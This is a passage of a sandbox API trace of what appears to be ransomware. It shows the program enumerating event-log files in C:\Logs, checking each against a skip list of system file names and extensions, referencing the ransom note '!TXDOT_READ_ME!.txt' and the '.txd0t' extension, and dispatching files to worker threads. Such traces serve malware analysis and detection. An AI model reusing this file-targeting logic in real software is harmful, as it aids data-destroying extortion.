(psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="debug.txt") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="boot.ini") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="desktop.ini") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="autorun.inf") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="ntuser.dat") returned -1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="ntldr") returned -1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="ntdetect.com") returned -1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="bootfont.bin") returned 1 [0089.463] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4ActionCenter.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.463] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned=".evtx" [0089.463] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.463] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.473] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.473] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" [0089.473] SetEvent (hEvent=0x3fc) returned 1 [0089.473] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5095bc04, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5095bc04, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cAlternateFileName="MIBD88~1.EVT")) returned 1 [0089.473] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2=".") returned 1 [0089.473] StrCmpW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="..") returned 1 [0089.473] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.473] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.473] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" [0089.473] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned=".evtx" [0089.473] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="bootsect.bak") returned 1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="iconcache.db") returned 1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="thumbs.db") returned -1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2=" ransomware ") returned 1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2=" ransom ") returned 1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="debug.txt") returned 1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="boot.ini") returned 1 [0089.473] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="desktop.ini") returned 1 [0089.474] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="autorun.inf") returned 1 [0089.474] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="ntuser.dat") returned -1 [0089.474] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="ntldr") returned -1 [0089.474] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="ntdetect.com") returned -1 [0089.474] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="bootfont.bin") returned 1 [0089.474] StrCmpIW (psz1="Microsoft-Windows-UserPnp%4DeviceInstall.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.474] PathFindExtensionW (pszPath="Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned=".evtx" [0089.474] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.474] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.489] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.489] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" [0089.489] SetEvent (hEvent=0x3fc) returned 1 [0089.490] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b97f64, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b97f64, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cAlternateFileName="MICC17~1.EVT")) returned 1 [0089.490] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2=".") returned 1 [0089.490] StrCmpW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="..") returned 1 [0089.490] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.490] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.490] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" [0089.490] PathFindExtensionW (pszPath="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned=".evtx" [0089.490] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2=" ransom ") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="debug.txt") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="boot.ini") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="ntldr") returned -1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.490] StrCmpIW (psz1="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.490] PathFindExtensionW (pszPath="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned=".evtx" [0089.490] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.490] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.495] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.495] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" [0089.495] SetEvent (hEvent=0x418) returned 1 [0089.495] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc986efe1, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xc986efe1, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Wcmsvc%4Operational.evtx", cAlternateFileName="MI72BF~1.EVT")) returned 1 [0089.495] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2=".") returned 1 [0089.495] StrCmpW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="..") returned 1 [0089.495] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.495] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.495] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Wcmsvc%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" [0089.495] PathFindExtensionW (pszPath="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned=".evtx" [0089.495] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2=" ransom ") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="debug.txt") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="boot.ini") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="ntldr") returned -1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.495] StrCmpIW (psz1="Microsoft-Windows-Wcmsvc%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.495] PathFindExtensionW (pszPath="Microsoft-Windows-Wcmsvc%4Operational.evtx") returned=".evtx" [0089.496] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.496] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.496] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.496] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Wcmsvc%4Operational.evtx" [0089.496] SetEvent (hEvent=0x408) returned 1 [0089.496] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb426548, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb426548, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4Operational.evtx", cAlternateFileName="MI7501~1.EVT")) returned 1 [0089.496] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2=".") returned 1 [0089.496] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="..") returned 1 [0089.496] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.496] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.496] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4Operational.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" [0089.496] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4Operational.evtx") returned=".evtx" [0089.496] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="bootsect.bak") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="iconcache.db") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="thumbs.db") returned -1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2=" ransomware ") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2=" ransom ") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="debug.txt") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="boot.ini") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="desktop.ini") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="autorun.inf") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="ntuser.dat") returned -1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="ntldr") returned -1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="ntdetect.com") returned -1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="bootfont.bin") returned 1 [0089.496] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4Operational.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.496] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4Operational.evtx") returned=".evtx" [0089.496] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.496] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0089.512] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.512] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4Operational.evtx" [0089.512] SetEvent (hEvent=0x3fc) returned 1 [0089.513] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb4729e7, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb4729e7, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Defender%4WHC.evtx", cAlternateFileName="MIF226~1.EVT")) returned 1 [0089.513] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2=".") returned 1 [0089.513] StrCmpW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="..") returned 1 [0089.513] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.513] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.513] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Defender%4WHC.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" [0089.513] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4WHC.evtx") returned=".evtx" [0089.513] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.513] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="bootsect.bak") returned 1 [0089.513] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="iconcache.db") returned 1 [0089.513] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="thumbs.db") returned -1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2=" ransomware ") returned 1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2=" ransom ") returned 1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="debug.txt") returned 1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="boot.ini") returned 1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="desktop.ini") returned 1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="autorun.inf") returned 1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="ntuser.dat") returned -1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="ntldr") returned -1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="ntdetect.com") returned -1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="bootfont.bin") returned 1 [0089.515] StrCmpIW (psz1="Microsoft-Windows-Windows Defender%4WHC.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.515] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Defender%4WHC.evtx") returned=".evtx" [0089.515] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.515] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0089.525] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.525] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" [0089.526] SetEvent (hEvent=0x418) returned 1 [0089.526] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4b19353, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd4b19353, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cAlternateFileName="MIDCC7~1.EVT")) returned 1 [0089.526] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2=".") returned 1 [0089.526] StrCmpW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="..") returned 1 [0089.526] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.526] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.526] StrNCatW (in: psz1="C:\\Logs\\", psz2="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned="C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx" [0089.526] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned=".evtx" [0089.526] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.526] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="bootsect.bak") returned 1 [0089.526] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="iconcache.db") returned 1 [0089.526] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="thumbs.db") returned -1 [0089.526] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2=" ransomware ") returned 1 [0089.526] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2=" ransom ") returned 1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="debug.txt") returned 1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="boot.ini") returned 1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="desktop.ini") returned 1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="autorun.inf") returned 1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="ntuser.dat") returned -1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="ntldr") returned -1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="ntdetect.com") returned -1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="bootfont.bin") returned 1 [0089.527] StrCmpIW (psz1="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.527] PathFindExtensionW (pszPath="Microsoft-Windows-Windows Firewall With Advanced Security%4ConnectionSecurity.evtx") returned=".evtx" [0089.527] StrStrIW 